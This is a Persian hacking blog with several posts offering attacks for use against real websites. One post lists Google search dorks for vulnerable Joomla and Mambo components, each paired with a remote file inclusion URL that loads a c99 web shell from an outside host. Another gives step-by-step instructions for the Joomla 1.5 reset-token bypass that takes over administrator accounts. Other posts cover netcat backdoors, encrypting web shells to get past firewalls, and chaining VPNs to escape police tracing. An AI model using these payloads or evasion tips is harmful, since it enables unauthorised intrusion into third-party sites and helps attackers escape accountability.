هک ، کرک،روت کیت،اسکریپت شلر

شاید شنیده باشید که اسنافر چیه ولی من بازم برای اونایی که نمیدونن توضیح میدم.

اسنایفر برنامه هست که به وسیله اون شما میتونید اطلاعاتی که از یه سیستمی که تو شبکه یا هر چیزی(مثلا شما و مخابرات) بین دو اتصال وصل میشه و اطلاعات رو که ارسال و دریاف میشه به شما هم نشون داده میشه.

وقتی که ما یه جایی که وایر لس داره و روش رمزم داره میخواید استفاده کنید . میتونید از این روش استفاده کنید و رمز وایر لس رو به دست بیارید. این کار خیلی راحت شده. که من فقط توضیح میدم و اسم برنامه رو نمیگم.با این برنامه ای که اسمش ___ هست شما میتونید به راحتی ظرف 1 ساعت پسورد 256 بیتی رو هم در بیارین و دیگه از امنیت وایر لس نترسید!

خیلی سادس !!! حالا اگه بشه و بچه های بالا اجازه بدن براتون برنامه رو میزارم که استفاده کنید.

+ نوشته شده در پنجشنبه هفتم بهمن 1389ساعت 10:15 |

اکسپلویت های جوملا

سرچ تو گوگل:
inurl:”com_joomlaboard”
ExpLoit:/components/com_joomlaboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
ExpLoit:/components/com_joomlaboard/image_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
———————————————————————–
سرچ تو گوگل:
inurl:”com_admin”
ExpLoit:/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
———————————————————————–
سرچ تو گوگل:
inurl:index.php?option=com_simpleboard
ExpLoit:/components/com_simpleboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
———————————————————————–
سرچ تو گوگل:
inurl:”com_hashcash”
ExpLoit:/components/com_hashcash/server.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
———————————————————————–
سرچ تو گوگل:
inurl:”com_sitemap”
ExpLoit:/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_forum”
ExpLoit:/components/com_forum/download.php?phpbb_root_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_pccookbook”
ExpLoit:/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:index.php?option=com_extcalendar
ExpLoit:/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”minibb”
ExpLoit:/components/minibb/index.php?absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_smf”
ExpLoit:/components/com_smf/smf.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/modules/mod_calendar.php?absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_pollxt”
ExpLoit:/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_loudmounth”
ExpLoit:/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_videodb”
ExpLoit:/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:index.php?option=com_pcchess
ExpLoit:/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_multibanners”
ExpLoit:/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_a6mambohelpdesk”
ExpLoit:/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_colophon”
ExpLoit:/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_mgm”
ExpLoit:/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_mambatstaff”
ExpLoit:/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_securityimages”
ExpLoit:/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_securityimages/lang.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_artlinks”
ExpLoit:/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_galleria”
ExpLoit:/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_zoom”
ExpLoit:/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”com_serverstat”
ExpLoit:/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
ExpLoit:/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
———————————————————————–
سرچ تو گوگل:
inurl:”mambo”
ExpLoit:/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??

+ نوشته شده در جمعه یکم بهمن 1389ساعت 17:58 |

چجوری هکر ها گیر میافتن؟

سلام

در کلیه شبکه هایی که اتصال چند کامپیوتر به هم یا به اینترنت دارن معمولا (تو سیستم های فعلی) از شناسه Ipv4 استفاده میشه که تا سال دیگه ظرفیتش پر میشه و سیستم جدیدی به نام IPv6 خیلی کار آمد میشه.

حالا ما وقتی به اینترنت وصل میشیم چه از ADSL چه از DialUp توسط ISP یه IP به شما داده میشه که معمولا توی DialUp هر بار که کانکت میشین یه IP به شما اختصاص داده میشه. توی ADSL این ای پی 1 ماهه هست.

IP که ISP به ما میده قبلا توسط خودشون به نام ISP ثبت شده.یعنی مثلا شروع IP از 192.168.0.1 تا 192.168.2.1 رو به IPS شما میدن و تو دیتابیس های Ip هم ذخیره میشه.(تا اینجا ای اس پی رو پیدا کردن و ISP)

حالا ساعت نفوذ به سایتشون که توی دیتابیس ذخیره میشه رو در میارن.

یه ISP نامه میزنن که این IP تو این ساعت به سایت ما نفوذ داشته!!

ISP هم تو LOG که از کل کاربراش داره IP و ساعت رو میزنه نام کاربری شما رو در میاره.البته توی دایل آپ از روی شماره می فهمن.وقتی که شماره شمارو پیدا کردن دیگه براسون کاری نداره که خونتون رو پیدا کنن.

چجوری از ردگیری در امان باشیم؟؟

بعضی از دوستان با 1 VPN برای هک سایت استفاده میکنن که این هم باز قابل پیگیری هست. درسته که VPN L2TP دیتا رو انکریپت میکنه. ولی مصل اینکه شما یادتون رفته که ای اس پی ازتون لاگ داره و راحت میتونه بفهمه که شما وصل شدین.چون شما وقتی با ایپی وی پی ان به سرور نفوذ کنید ایپی VPN تو سایت ذخیره میشه،حالا کافیه که ای پی شما رو که تو لاگ هست و نشون میده که شما تو این ساعت به این VPN

وصل شدید رو به راحتی نشون میده. برای حل این کار شما باید از 2 تا VPN استفاده کنید.یعنی تونل بزنید.اینجوری هیچ وقت پیدا نمیشید

روش دوم: مهندسی اجتماعی هست.معمولا خودم که یه سایت رو هک میکنم ای دی یاهوو رو هم میزارم .

حالا اونا با همین ایدی میتونن خودشون رو به اسم دختر معرفی کنن یا مثلا بگن که استخدامت میکنیمو از اینجور حرفا بعد که تو بری سر قرار میبینی ببببببببببببلللللللللله. پلیسن همشون اونم از نو Cyberi!!

+ نوشته شده در جمعه یکم بهمن 1389ساعت 9:9 |

شلر چیست؟

شلر به اسکریپتی گفته میشود که از کلیه امکانت سرور بر ضد امنیت خود سرور استفاده میکنه.

امکانات سلر های معمولی عبارتند از:

1.نمایش فایل های درون سرور(سایتی که این اسکریپت روش آپ شده)

2.اتصال به بانک اطلاعات سایت

3.جستجوی فایل

4.بای پس کردن (با استفاده از دستورات PHP یا ASP میتونه به روت دسترسی پیدا کنه)

5.بکدر(با استفاده از نت کت میتونید از سرور استفاده کنید حتی اگه شلرتون پاک بشه)

.....

اینا تازه نصف امکانات شلر ها هم نیست .

شلر های قدیمی معمولا توسط آنتی ویروس ها و فایل وال های سرور خودکار پاک میشه . ولی فایل وال رو هم میشه با یه روش گول زد که همون قدیمیها رو هم باز کنه . به وسیله انکریپت کردن اسکریپت.

+ نوشته شده در سه شنبه بیست و هشتم دی 1389ساعت 12:4 |

جوملا و اکسپلویت های ضایع!!

دوستان هیچ میدونستید که جوملا این سیستم مدیریت محتوا خیلی اکسپلویت داره؟

اکسپلویت به معنی اینه که با استفاده از دسترسی هایی که از یه سایت یا از یه اسکریپت داریم میتونیم اسکریپت رو دور بزنیم و توش یه سری اطلاعات وارد کنیم.

مثلا جوملا های نسخه 1.5 دارای یه اکسپلویت هستند که میشه به راحتی پسورد ادمین(مدیر سایت) روتغییر بدی و خودت بشی مدیر و مطلب بزاری یا شلر آپ کنی.

شلر به اسکریپتی میگن که به ما امکان میده که به راحتی بتونیم به تمام فایل ها و در بعضی سرور ها که امنیت 0 هست به تمامی سایت های روی اون سرور دسترسی داشته باشیم که حالا این باز یه بحث جداست که در موردش مینویسم.

خب یه نمونه اکسپلویت قدیمی که یکی دو ماهی هست از حالت مخفی (پریویت) به حالت همگانی ( پابلیک)

در اومده اینه:

index.php?option=com_user&view=reset&layout=confirm

اینو میدونید که این چیزی که بالا نوشتم رو باید به آخر آدرس سایت اضافه کنید.

مثال:

http://www.site.com/index.php?option=com_user&view=reset&layout=confirm

اینجوری.

حالا اگه این صفحه روش فعال باشه چجوری کار میکنه.

اگر این صفحه کار کنه یه تکست به شما نمایش داده میشه که کنارش نوشته Token یا نشانه به فارسی

باری اینکه رمز رو عوض کنید یه ' یا " یا -- توی اون تکست بزنید. اگر این اکسپلویت روش کار کنه شما به صفحه جدیدی برده میشید که دو تا تکست داره و باید رمز جدید رو توش وارد کنید. بعد از تغییر رمز مدیر به آدرس مدیریت یعنی http://www.site.com/administrator

برید و نام کاربری که معمولا :administrator هست و رمز هم همونه که شما میدونید.

همیییین;)

+ نوشته شده در سه شنبه بیست و هشتم دی 1389ساعت 11:52 |

را اندازی وبلاگ

سلام دوستان من تو این وبلاگ میخوام روش های هک کردن و افزایش اطلاعات عمومی در مورد امنیت و کامپیوتر به شما میگم.

+ نوشته شده در سه شنبه بیست و هشتم دی 1389ساعت 11:0 |